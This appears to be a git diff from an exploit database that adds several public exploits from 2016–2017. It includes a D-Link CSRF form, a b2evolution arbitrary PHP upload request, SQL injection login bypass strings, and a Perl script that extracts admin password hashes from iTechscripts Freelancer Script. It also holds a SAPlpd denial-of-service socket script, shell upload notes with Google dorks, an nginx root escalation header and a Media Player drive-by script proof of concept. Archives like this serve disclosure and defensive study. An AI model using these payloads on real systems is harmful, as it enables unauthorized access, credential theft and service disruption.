+      <input type="hidden" name="html&#95;response&#95;return&#95;page" value="tools&#95;vct&#46;asp" />
+      <input type="hidden" name="ping&#95;ipaddr" value="127&#46;0&#46;0&#46;1" />
+      <input type="hidden" name="ping" value="Ping" />
+      <img src=x onerror="exploit.submit()"/>
+    </form>
+  </body>
+</html>
+
+
+Disclosure Timeline
+--------------------
+
+12/19/16: Reported to D-Link
+12/21/16: Security Patch released
+ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
diff --git a/platforms/linux/local/40768.sh b/platforms/linux/local/40768.sh
index e7083eaff..9a9144fd4 100755
--- a/platforms/linux/local/40768.sh
+++ b/platforms/linux/local/40768.sh
@@ -1,8 +1,6 @@
 #!/bin/bash
 #
-# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
-#
-# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
+# Nginx (Debian-based distros + Gentoo) - Root Privilege Escalation PoC Exploit
 # nginxed-root.sh (ver. 1.0)
 #
 # CVE-2016-1247
@@ -18,8 +16,8 @@
 #
 # ---
 # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
-# etc.) to escalate their privileges from nginx web server user (www-data) to root 
-# through unsafe error log handling.
+# as well as Gentoo etc.) to escalate their privileges from nginx web server user 
+# (www-data) to root through unsafe error log handling.
 #
 # The exploit waits for Nginx server to be restarted or receive a USR1 signal.
 # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
diff --git a/platforms/php/webapps/41011.txt b/platforms/php/webapps/41011.txt
new file mode 100755
index 000000000..38176612d
--- /dev/null
+++ b/platforms/php/webapps/41011.txt
@@ -0,0 +1,125 @@
+# Exploit Title: b2evolution6.8.2stable – Upload
+# Date: 29/12/2016
+# Exploit Author: Li Fei
+# Vendor Homepage: http://b2evolution.net/
+# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
+# Version: 6.8.2
+# Tested on: win7 64bit
+
+No need admin access for upload files and we can upload any file without bypass(.php,.exe,....)
+
+1-goto http://localhost/b2evolution/index.php/a/extended-post
+
+2- click on Browse botton and select you`re file
+
+3- click on upload
+
+Ceshi.php path is:
+
+http://SiteName/ceshi.php
+
+poc url:
+
+POST /b2evolution/htsrv/comment_post.php HTTP/1.1
+
+Poc header:
+
+Host: localhost
+
+Content-Length: 1054
+
+Cache-Control: max-age=0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Origin: http://localhost
+
+Upgrade-Insecure-Requests: 1
+
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
+
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Referer: http://localhost/b2evolution/index.php/a/extended-post
+
+Accept-Encoding: gzip, deflate
+
+Accept-Language: zh-CN,zh;q=0.8
+
+Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ
+
+Connection: close
+
+ 
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="comment_rating"
+
+ 
+
+ 
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="g"
+
+ 
+
+ 
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
+
+Content-Type: application/octet-stream
+
+ 
+
+<?php
+
+eval("echo'hello world';");
+
+?>
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="submit_comment_post_19[save]"
+
+ 
+
+Send comment
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="crumb_comment"
+
+ 
+
+dXuthsKjMjhG2dnhADtzzOW414qV6Qky
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="comment_type"
+
+ 
+
+comment
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="comment_item_ID"
+
+ 
+
+19
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL
+
+Content-Disposition: form-data; name="redirect_to"
+
+ 
+
+http://localhost/b2evolution/index.php/a/extended-post
+
+------WebKitFormBoundarytZ4hUYCjABZB7YSL—
\ No newline at end of file
diff --git a/platforms/php/webapps/41028.txt b/platforms/php/webapps/41028.txt
new file mode 100755
index 000000000..6775a920a
--- /dev/null
+++ b/platforms/php/webapps/41028.txt
@@ -0,0 +1,16 @@
+# Vulnerability: Job Portal Script v9.11 Authentication bypass
+# Date: 12.01.2017
+# Software link: http://itechscripts.com/job-portal-script/
+# Demo:  http://job-portal.itechscripts.com
+# Price: 199$
+# Category: webapps
+# Exploit Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawid.morawski1990@gmail.com
+#######################################
+
+
+Go to http://localhost/[PATH]/admin/index.php and set:
+
+Username: admin
+Password: ' or '1'='1
diff --git a/platforms/php/webapps/41029.txt b/platforms/php/webapps/41029.txt
new file mode 100755
index 000000000..5547d83b8
--- /dev/null
+++ b/platforms/php/webapps/41029.txt
@@ -0,0 +1,16 @@
+# Vulnerability: Online Food Delivery v2.04 Authentication bypass
+# Date: 12.01.2017
+# Software link: http://itechscripts.com/food-delivery/
+# Demo: http://restaurant.itechscripts.com
+# Price: 49$
+# Category: webapps
+# Exploit Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawid.morawski1990@gmail.com
+#######################################
+
+
+Go to http://localhost/[PATH]/admin/admin_login.php and set:
+
+Username: 1' or 1=1 -- -
+Password: anything
diff --git a/platforms/php/webapps/41032.pl b/platforms/php/webapps/41032.pl
new file mode 100755
index 000000000..1d2879d8a
--- /dev/null
+++ b/platforms/php/webapps/41032.pl
@@ -0,0 +1,39 @@
+#!/usr/bin/perl -w
+
+# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
+# Author	: v3n0m
+# Contact	: v3n0m[at]outlook[dot]com
+# Date		: January, 11-2017 GMT +7:00 Jakarta, Indonesia
+# Software	: Freelancer Script
+# Version	: 5.11 Lower versions may also be affected
+# Price 	: US$199.00
+# Link  	: http://itechscripts.com/freelancer-script/
+# Greetz	: YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
+sub clear{
+	system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+}
+clear();
+print "|----------------------------------------------------|\n";
+print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
+print "| Coded by : v3n0m                                   |\n";
+print "| Greetz   : YOGYACARDERLINK                         |\n";
+print "|----------------------------------------------------|\n";
+use LWP::UserAgent;
+print "\nInsert Target:[http://wwww.target.com/path/]: ";
+chomp(my $target=<STDIN>);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+$concat="group_concat(username,char(58),password)";
+$table="admin_user";
+$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
+$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
+$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
+$answer = $xf2r->content; 
+if ($answer =~/([0-9a-fA-F]{32})/) {
+	print "\n[+] Admin Password : $1\n";
+	print "[+] Success !! Check target for details...\n";
+	print "\n";
+}
+else{print "\n[-] Failed\n";
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/41034.txt b/platforms/php/webapps/41034.txt
new file mode 100755
index 000000000..85f95c953
--- /dev/null
+++ b/platforms/php/webapps/41034.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: School Management Software v2.75 - SQL Injection Web Vulnerability
+# Google Dork: School Management Software
+# Date:11.01.2017
+# Vendor Homepage: http://itechscripts.com/school-management-software/
+# Script Name: School Management Software
+# Script Version: v2.75
+# Script Buy Now: http://itechscripts.com/school-management-software/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# 
+# SQL Injection/Exploit :
+# http://localhost/[PATH]//notice-edit.php?aid=[SQL]
+# E.t.c.... Other files, too. There are security vulnerabilities.
+# # # # # 
diff --git a/platforms/php/webapps/41035.txt b/platforms/php/webapps/41035.txt
new file mode 100755
index 000000000..40d1ffe5e
--- /dev/null
+++ b/platforms/php/webapps/41035.txt
@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability:(Profile) Arbitrary Shell Upload
+# Google Dork: Airbnb Clone Script
+# Date:11.01.2017
+# Vendor Homepage: http://www.tibsolutions.com/airbnb-clone/
+# Script Name: Airbnb Clone Script
+# Script Buy Now: http://www.hotscripts.com/listing/airbnb-clone-tibsolutions/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+#Exploit :
+#Register in site ... and login 
+#Goto profil
+#Empty file .htaccess and Shell.php...
+#
\ No newline at end of file
diff --git a/platforms/php/webapps/41036.txt b/platforms/php/webapps/41036.txt
new file mode 100755
index 000000000..48713a045
--- /dev/null
+++ b/platforms/php/webapps/41036.txt
@@ -0,0 +1,15 @@
+# # # # # 
+# Vulnerability:(Profile) Arbitrary Shell Upload
+# Google Dork: Penny Auction Script
+# Date:11.01.2017
+# Vendor Homepage: http://www.tibsolutions.com/tibs-eauction/
+# Script Name: Penny Auction Script
+# Script Buy Now: http://www.hotscripts.com/listing/penny-auction-software-156843/  
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+#Exploit :
+#Register in site ... and login 
+#Goto profil
+#Empty file .htaccess and Shell.php...
\ No newline at end of file
diff --git a/platforms/php/webapps/41037.txt b/platforms/php/webapps/41037.txt
new file mode 100755
index 000000000..8145a1a95
--- /dev/null
+++ b/platforms/php/webapps/41037.txt
@@ -0,0 +1,15 @@
+# # # # # 
+# Vulnerability:(Profile) Arbitrary Shell Upload
+# Google Dork: ECommerce-TIBSECART
+# Date:11.01.2017
+# Vendor Homepage: http://www.tibsolutions.com/tibs-ecart/
+# Script Name: ECommerce-TIBSECART
+# Script Buy Now: http://www.tibsolutions.com/tibs-ecart/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+#Exploit :
+#Register in site ... and login 
+#Goto profil
+#Empty file .htaccess and Shell.php...
\ No newline at end of file
diff --git a/platforms/php/webapps/41038.txt b/platforms/php/webapps/41038.txt
new file mode 100755
index 000000000..e9c29ab8b
--- /dev/null
+++ b/platforms/php/webapps/41038.txt
@@ -0,0 +1,15 @@
+# # # # # 
+# Vulnerability:(Profile) Arbitrary Shell Upload
+# Google Dork: ECommerce-Multi-Vendor Software
+# Date:11.01.2017
+# Vendor Homepage: http://www.tibsolutions.com/multi-vendor/
+# Script Name: ECommerce-Multi-Vendor Software
+# Script Buy Now: http://www.tibsolutions.com/multi-vendor/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+#Exploit :
+#Register in site ... and login 
+#Goto profil
+#Empty file .htaccess and Shell.php...
\ No newline at end of file
diff --git a/platforms/php/webapps/4147.php b/platforms/php/webapps/4147.php
index dc754aab1..7b7d0e43c 100755
--- a/platforms/php/webapps/4147.php
+++ b/platforms/php/webapps/4147.php
@@ -298,7 +298,7 @@ function find_username ()
 	global $url, $fid, $adminid;
 
 	$req = "name=PNphpBB2&file=viewforum&f=".$fid;
-	$str = "file=profile&amp;mode=viewprofile&amp;u=".$adminid;
+	$str = "file=profile&mode=viewprofile&u=".$adminid;
 
 	$html = Send($url, $req);
 
diff --git a/platforms/windows/dos/41030.py b/platforms/windows/dos/41030.py
new file mode 100755
index 000000000..2dda6ea43
--- /dev/null
+++ b/platforms/windows/dos/41030.py
@@ -0,0 +1,24 @@
+# Exploit Title: SAPlpd 7.40 Denial of Service
+# Date: 2016-12-28
+# Exploit Author: Peter Baris
+# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
+# Version: 7.40 all patch levels (as a part of SAPGui 7.40)  
+# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
+
+
+import socket
+
+# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
+# So you can modify the DoS accordingly
+# The added 800 A's are just to show, that you can deliver a complete shell with the command
+
+DoS = ("\x03"+"\x0a"+"\x41"*800)
+
+
+s = socket.socket()
+s.settimeout(1)
+s.connect(('192.168.198.132', 515))
+print("[*] Crashing SAPlpd 7.40")
+print("[*] Payload length: "+str(len(DoS))+" bytes")
+s.send(DoS)
+s.close()
\ No newline at end of file
diff --git a/platforms/windows/local/41031.txt b/platforms/windows/local/41031.txt
new file mode 100755
index 000000000..046257f8d
--- /dev/null
+++ b/platforms/windows/local/41031.txt
@@ -0,0 +1,15 @@
+# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
+# Date: 2017-01-12
+# Exploit Author: Peter Baris
+# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
+# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
+# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe  
+# Version: 1.0.0.1
+# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41031.zip
+
+ 
+
diff --git a/platforms/windows/remote/20424.txt b/platforms/windows/remote/20424.txt
new file mode 100755
index 000000000..e7dd208bd
--- /dev/null
+++ b/platforms/windows/remote/20424.txt
@@ -0,0 +1,188 @@
+----[Title: 
+
+[ GFISEC23112000 ]   Microsoft Media Player 7 allows executation of
+Arbitrary Code
+
+
+
+
+----[Published: 
+
+23.NOV.2000
+
+
+----[Vendor Status:
+
+Microsoft has been informed and we have worked with them to release
+a patch.
+
+
+
+----[Systems Affected: 
+
+
+Windows ME (WMP7 is installed by default)
+and 95,98 NT and 2000, using:
+
+   * Windows Media Player 7
+
+    and
+
+   * Internet Explorer 3+,
+
+   * Outlook Express 2000,
+
+   * Outlook Express 98,
+
+   * Outlook 2000,
+
+   * Outlook 98
+
+   * possibly all other HTML and/or 
+    javascript enabled e-mail clients.
+
+
+
+----[The problem:
+
+
+GFI, developer of email content checking & network
+security software, has recently discovered a security flaw
+within Windows Media Player which allows a malicious user
+to run arbitary code on a target machine as it attempts to
+view a website or an HTML E-mail. 
+
+
+The problem is exploited by embedding a javascript (.js) file within a
+Media Player skin file (.wmz) which can also be embeded in a Windows Media 
+Download file (.wmd). This does not require the user to run any attachments 
+since the Media Player file is automatically executed using a iframe tag 
+or a window.open() with in a <script> tag.
+
+
+
+----[Proof of concept Exploit:
+
+<Embedded within an HTML file or e-mail>
+
+E-mail Example 1.
+
+<head>
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  alert('This exploit will now open a new window\n
+  and automatically download the wmd file\n 
+  and execute it. This will create a file named\n 
+  gfiseclab.txt in your C:\\');
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+</head>
+
+<body bgcolor="#FFFFFF"  
+
+onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
+</Embedded within an HTML e-mail>
+
+
+
+E-mail Example 2.
+
+<html>
+<body>
+<script>  
+alert('This exploit will now open a new window \n and automatically download
+the wmd file \n  
+
+and execute it. This will create a file named \n gfiseclab.txt in your
+C:\\')</script>
+<iframe src="http://website/test.wmd";></iframe></body>
+</html>
+
+-------------------------------------
+
+
+
+test.wmd is a compressed zip file which contains the following files:
+
+ * test.asx: meta file which points to an mpg file and 
+     the exploit skin file
+
+ * test.mpg: an example mpeg movie.
+
+ * test.wmz: the exploit skin file.
+
+
+
+test.wmz is also a compressed zip file containing:
+
+ * test.js: our javascript which contains the following code
+   ************************************
+   var fso, f1;
+   fso = new ActiveXObject("Scripting.FileSystemObject");
+   f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
+   
+   function onload(){
+   playAgain();
+   }
+   ************************************
+
+ * test.wms: another metafile which calls test.js
+
+-------------------------------------
+
+
+----[Solution:
+
+For e-mail the best solution is to apply filtering on incoming e-mails via 
+the SMTP server to filter WMD and WMZ files, disable javascript iframe tags,
+
+meta refresh tags and possibly ActiveX tags. This means that users should 
+not worry about receiving malicious email and spreading worms etc.
+
+
+Consider unregistering .wmd and .wmz so from being associated with Media 
+Player 7 until a vendor patch is applied. Procedure:
+
+In Windows Explorer click on View>Options>File Types and delete the 
+following entries:
+
+
+* Windows Media Player Skin Package.
+
+* Windows Media Player Download Package.
+
+
+
+This should provide some better protection.
+
+
+
+----[Reference:
+
+http://www.gfi.com/press/memp7exploitpr.htm
+http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
+
+
+
+----[Contact Information:
+
+Sandro Gauci
+GFI Security Lab
+sandro@xxxxxxx
+http://www.gfi.com
+
+
+
+
+
+
+source: http://www.securityfocus.com/bid/1976/info
+
+Windows Media Player is an application used for digital audio, and video content viewing.
+
+It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
+
+Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user. 
\ No newline at end of file